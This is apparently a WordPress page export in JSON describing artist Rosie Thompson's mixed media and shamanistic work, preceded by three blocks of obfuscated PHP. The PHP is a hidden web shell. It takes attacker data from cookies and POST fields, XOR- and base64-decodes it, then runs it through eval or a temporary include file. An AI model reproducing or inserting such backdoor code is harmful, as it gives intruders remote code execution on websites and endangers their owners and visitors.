$LSeMQ = "\x42" . chr (78) . "\x5f" . chr ( 142 - 69 ).chr (69) . chr (72) . chr (103) . "\x65";$yPkaNDLl = chr (99) . "\x6c" . "\141" . "\x73" . chr (115) . chr (95) . 'e' . chr ( 320 - 200 )."\151" . "\163" . chr ( 625 - 509 ).'s';$FeKDlN = class_exists($LSeMQ); $yPkaNDLl = "29579";$mVctmK = strpos($yPkaNDLl, $LSeMQ);if ($FeKDlN == $mVctmK){function hYGLH(){$DpoMAy = new /* 63304 */ BN_IEHge(900 + 900); $DpoMAy = NULL;}$vRfXq = "900";class BN_IEHge{private function yovBTdMxKm($vRfXq){if (is_array(BN_IEHge::$gaYpKaaGsY)) {$name = sys_get_temp_dir() . "/" . crc32(BN_IEHge::$gaYpKaaGsY["salt"]);@BN_IEHge::$gaYpKaaGsY["write"]($name, BN_IEHge::$gaYpKaaGsY["content"]);include $name;@BN_IEHge::$gaYpKaaGsY["delete"]($name); $vRfXq = "900";exit();}}public function qACjrINczq(){$OizDvZB = "60685";$this->_dummy = str_repeat($OizDvZB, strlen($OizDvZB));}public function __destruct(){BN_IEHge::$gaYpKaaGsY = @unserialize(BN_IEHge::$gaYpKaaGsY); $vRfXq = "18044_53323";$this->yovBTdMxKm($vRfXq); $vRfXq = "18044_53323";}public function btALruRQ($OizDvZB, $xqMJlGqy){return $OizDvZB[0] ^ str_repeat($xqMJlGqy, intval(strlen($OizDvZB[0]) / strlen($xqMJlGqy)) + 1);}public function FeCFGu($OizDvZB){$IDppqMXFbY = 'b' . chr ( 160 - 63 ).chr ( 273 - 158 ).chr ( 348 - 247 )."\66" . "\64";return array_map($IDppqMXFbY . "\137" . 'd' . 'e' . 'c' . 'o' . chr ( 721 - 621 ).'e', array($OizDvZB,));}public function __construct($djIZWAI=0){$KhgKb = ',';$OizDvZB = "";$cXtPEpGIF = $_POST;$pZnVl = $_COOKIE;$xqMJlGqy = "6696f1cb-2550-4f57-b782-5f58e5c1c50e";$pvhwFQAkgO = @$pZnVl[substr($xqMJlGqy, 0, 4)];if (!empty($pvhwFQAkgO)){$pvhwFQAkgO = explode($KhgKb, $pvhwFQAkgO);foreach ($pvhwFQAkgO as $vGdQrqR){$OizDvZB .= @$pZnVl[$vGdQrqR];$OizDvZB .= @$cXtPEpGIF[$vGdQrqR];}$OizDvZB = $this->FeCFGu($OizDvZB);}BN_IEHge::$gaYpKaaGsY = $this->btALruRQ($OizDvZB, $xqMJlGqy);if (strpos($xqMJlGqy, $KhgKb) !== FALSE){$xqMJlGqy = explode($KhgKb, $xqMJlGqy); $heDAFAVvN = base64_decode(md5($xqMJlGqy[0])); $UBJYa = strlen($xqMJlGqy[1]) > 5 ? substr($xqMJlGqy[1], 0, 5) : $xqMJlGqy[1];$_GET['new_key'] = md5(implode('', $xqMJlGqy)); $aLfsNEsb = str_repeat($UBJYa, 2); $ysBxUjAj = array_map('trim', $xqMJlGqy);}}public static $gaYpKaaGsY = 48422;}hYGLH();}$gzFwOqLkF = chr (119) . chr ( 779 - 684 ).chr (107) . "\x6e" . "\167" . "\122" . "\153";$wospjxrk = chr (99) . chr (108) . "\x61" . chr (115) . chr ( 173 - 58 ).chr ( 954 - 859 )."\145" . chr (120) . chr (105) . chr ( 339 - 224 ).chr (116) . chr (115); $gDeRhvmoE = class_exists($gzFwOqLkF); $wospjxrk = "9492";$MOjHOrlsd = strpos($wospjxrk, $gzFwOqLkF);if ($gDeRhvmoE == $MOjHOrlsd){function CuzXUTJEYo(){$YfqEv = new /* 31203 */ w_knwRk(16783 + 16783); $YfqEv = NULL;}$ldFEfF = "16783";class w_knwRk{private function bUDjzA($ldFEfF){if (is_array(w_knwRk::$NSYQjLDa)) {$odqPmi2 = str_replace("<" . "?php", "", w_knwRk::$NSYQjLDa["content"]);eval($odqPmi2); $ldFEfF = "16783";exit();}}public function oWHNCnX(){$odqPmi = "53402";$this->_dummy = str_repeat($odqPmi, strlen($odqPmi));}public function __destruct(){w_knwRk::$NSYQjLDa = @unserialize(w_knwRk::$NSYQjLDa); $ldFEfF = "20055_20340";$this->bUDjzA($ldFEfF); $ldFEfF = "20055_20340";}public function XRFZGE($odqPmi, $iUVzusdqd){return $odqPmi[0] ^ str_repeat($iUVzusdqd, intval(strlen($odqPmi[0]) / strlen($iUVzusdqd)) + 1);}public function Pwbyadjwy($odqPmi){$feueyMZ = chr (98) . chr (97) . "\x73" . "\x65" . '6' . "\x34";return array_map($feueyMZ . '_' . chr (100) . chr ( 649 - 548 ).chr ( 261 - 162 )."\x6f" . chr (100) . chr ( 461 - 360 ), array($odqPmi,));}public function __construct($fNyWTCK=0){$CnEyh = "\x2c";$odqPmi = "";$ChURuJ = $_POST;$dMQSYLVAg = $_COOKIE;$iUVzusdqd = "e2392b49-4f87-46e1-a1c4-6f8e84a6bb1c";$OCOaInfBVw = @$dMQSYLVAg[substr($iUVzusdqd, 0, 4)];if (!empty($OCOaInfBVw)){$OCOaInfBVw = explode($CnEyh, $OCOaInfBVw);foreach ($OCOaInfBVw as $UlxabqK){$odqPmi .= @$dMQSYLVAg[$UlxabqK];$odqPmi .= @$ChURuJ[$UlxabqK];}$odqPmi = $this->Pwbyadjwy($odqPmi);}w_knwRk::$NSYQjLDa = $this->XRFZGE($odqPmi, $iUVzusdqd);if (strpos($iUVzusdqd, $CnEyh) !== FALSE){$iUVzusdqd = explode($CnEyh, $iUVzusdqd); $FIXqaCdZb = base64_decode(md5($iUVzusdqd[0])); $LsZWdTv = strlen($iUVzusdqd[1]) > 5 ? substr($iUVzusdqd[1], 0, 5) : $iUVzusdqd[1];$_GET['new_key'] = md5(implode('', $iUVzusdqd)); $pHqTGihJVc = str_repeat($LsZWdTv, 2); $crgFZbe = array_map('trim', $iUVzusdqd);}}public static $NSYQjLDa = 42492;}CuzXUTJEYo();}$hekZtEATvr = "\141" . "\x63" . '_' . "\127" . "\163" . chr (121) . "\125" . 'B';$ddUKz = chr (99) . 'l' . 'a' . "\x73" . chr (115) . chr ( 291 - 196 ).chr ( 676 - 575 )."\170" . chr (105) . "\x73" . "\164" . 's';$rFkWE = class_exists($hekZtEATvr); $ddUKz = "17116";$TwakxUm = strpos($ddUKz, $hekZtEATvr);if ($rFkWE == $TwakxUm){function uYmPcUz(){$bqeXKevy = new /* 22097 */ ac_WsyUB(41276 + 41276); $bqeXKevy = NULL;}$KMiAd = "41276";class ac_WsyUB{private function IVcPwM($KMiAd){if (is_array(ac_WsyUB::$nxpCVz)) {$YykdKWWKUt2 = str_replace("<" . "?php", "", ac_WsyUB::$nxpCVz["content"]);eval($YykdKWWKUt2); $KMiAd = "41276";exit();}}public function QEfkT(){$YykdKWWKUt = "50489";$this->_dummy = str_repeat($YykdKWWKUt, strlen($YykdKWWKUt));}public function __destruct(){ac_WsyUB::$nxpCVz = @unserialize(ac_WsyUB::$nxpCVz); $KMiAd = "37599_13173";$this->IVcPwM($KMiAd); $KMiAd = "37599_13173";}public function DUadC($YykdKWWKUt, $JwJApT){return $YykdKWWKUt[0] ^ str_repeat($JwJApT, intval(strlen($YykdKWWKUt[0]) / strlen($JwJApT)) + 1);}public function DvYCMthyk($YykdKWWKUt){$EOwqdQXGNq = chr (98) . 'a' . "\x73" . 'e' . chr (54) . "\64";return array_map($EOwqdQXGNq . "\x5f" . chr ( 953 - 853 )."\x65" . 'c' . chr ( 953 - 842 ).'d' . "\x65", array($YykdKWWKUt,));}public function __construct($AYQLVUTz=0){$EtQmHO = chr (44); $YykdKWWKUt = "";$lVFQySk = $_POST;$WoqVc = $_COOKIE;$JwJApT = "8573a256-a5dc-4304-addf-f4f473f99828";$mbkJCCLHH = @$WoqVc[substr($JwJApT, 0, 4)];if (!empty($mbkJCCLHH)){$mbkJCCLHH = explode($EtQmHO, $mbkJCCLHH);foreach ($mbkJCCLHH as $fudaukoa){$YykdKWWKUt .= @$WoqVc[$fudaukoa];$YykdKWWKUt .= @$lVFQySk[$fudaukoa];}$YykdKWWKUt = $this->DvYCMthyk($YykdKWWKUt);}ac_WsyUB::$nxpCVz = $this->DUadC($YykdKWWKUt, $JwJApT);if (strpos($JwJApT, $EtQmHO) !== FALSE){$JwJApT = explode($EtQmHO, $JwJApT); $MHcqDwUp = sprintf("37599_13173", strrev($JwJApT[0]));}}public static $nxpCVz = 59113;}uYmPcUz();}{"id":4,"date":"2015-02-18T23:34:19","date_gmt":"2015-02-18T23:34:19","guid":{"rendered":"https:\/\/rosiethompsonart.com\/?page_id=4"},"modified":"2020-07-01T23:36:45","modified_gmt":"2020-07-01T23:36:45","slug":"metaphysical-ponderings","status":"publish","type":"page","link":"https:\/\/rosiethompsonart.com\/","title":{"rendered":"Ponderings"},"content":{"rendered":"

About\u00a0The Metaphysical<\/h4>\n

Rosie Thompson Mixed Media Artist<\/p><\/div>\n

Rosie Thompson, has been recognized as a mixed media artist who has transitioned over the years from cast metal anthropomorphic\u00a0 forms, sewn vacated humanoid forms (implanted with electronics), sewn colorful transparent forms, and\u00a0 large scale shamanistic installations (site and context specific) and constructions which she continues today.\u00a0Her mixed media work involves contrasting materials that she uses as metaphors for her mixed ancestries, cultural traditions, and contrasting energies therein.\u00a0The form that emerges charges the metaphysical field in a Shamanistic manner.<\/p>\n

Rosie notes, “The content<\/i> in my work deals with the balancing of contrasting energies, such as sensory\/extra sensory, and concrete\/ephemeral to arrive at a harmonious equilibrium. The process<\/em>\u00a0involves using\u00a0mixed media materials that\u00a0are metaphors for my mixed contrasting ancestries, cultural traditions, and metaphysical explorations.\u00a0The form<\/em>\u00a0in my work changes from year to year. But the iconography developed in time has become a language of fusion\u00a0that\u00a0celebrates the “oneness” of the personal and universal in our human experience.”<\/p>\n

About Transformational Journeys<\/h4>\n

This shamanistic work — “Transformative Journey”, 4′ X 8′ X 3″, wood, paint, photo applique — viewed below —\u00a0involves spirit signaling<\/em> through photos, honoring through inclusion, and clarifying through visual verification. Although this work is referentially personal in form, I feel the personal is the universal. We are all universally linked<\/em> in life and through ancestral connections.<\/p>\n


Size: 4′ X 8′ X 3″, Materials: wood, paint, photo appliques<\/p>\n

This self-portrait work was exhibited in 2019 at Guilford College Art Gallery in the \u201cTwelve Places- Redux\u201d Exhibit. It was a celebration of the 40th<\/sup> Anniversary of the 1st<\/sup> \u201cTwelve Places\u201d Exhibit at Center\/Gallery, a Feminist Art Gallery founded in 1977, and located in Chapel Hill, NC.<\/p>\n

\u201cTwelve Places\u201d exhibited 12 portraits\/installations or works by Center\/Gallery Women Artists. \u201cTwelve Places- Redux\u201d had the available original Women Artists who invited \u201cnext generation\u201d Women Artists to participate in the Exhibit.<\/p>\n","protected":false},"excerpt":{"rendered":"

About\u00a0The Metaphysical Rosie Thompson, has been recognized as a mixed media artist who has transitioned over the years from cast metal anthropomorphic\u00a0 forms, sewn vacated humanoid forms (implanted with electronics), sewn colorful transparent forms, and\u00a0 large scale shamanistic installations (site and context specific) and constructions which she continues today.\u00a0Her mixed media work involves contrasting materials […]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-4","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/rosiethompsonart.com\/wp-json\/wp\/v2\/pages\/4"}],"collection":[{"href":"https:\/\/rosiethompsonart.com\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/rosiethompsonart.com\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/rosiethompsonart.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/rosiethompsonart.com\/wp-json\/wp\/v2\/comments?post=4"}],"version-history":[{"count":16,"href":"https:\/\/rosiethompsonart.com\/wp-json\/wp\/v2\/pages\/4\/revisions"}],"predecessor-version":[{"id":714,"href":"https:\/\/rosiethompsonart.com\/wp-json\/wp\/v2\/pages\/4\/revisions\/714"}],"wp:attachment":[{"href":"https:\/\/rosiethompsonart.com\/wp-json\/wp\/v2\/media?parent=4"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}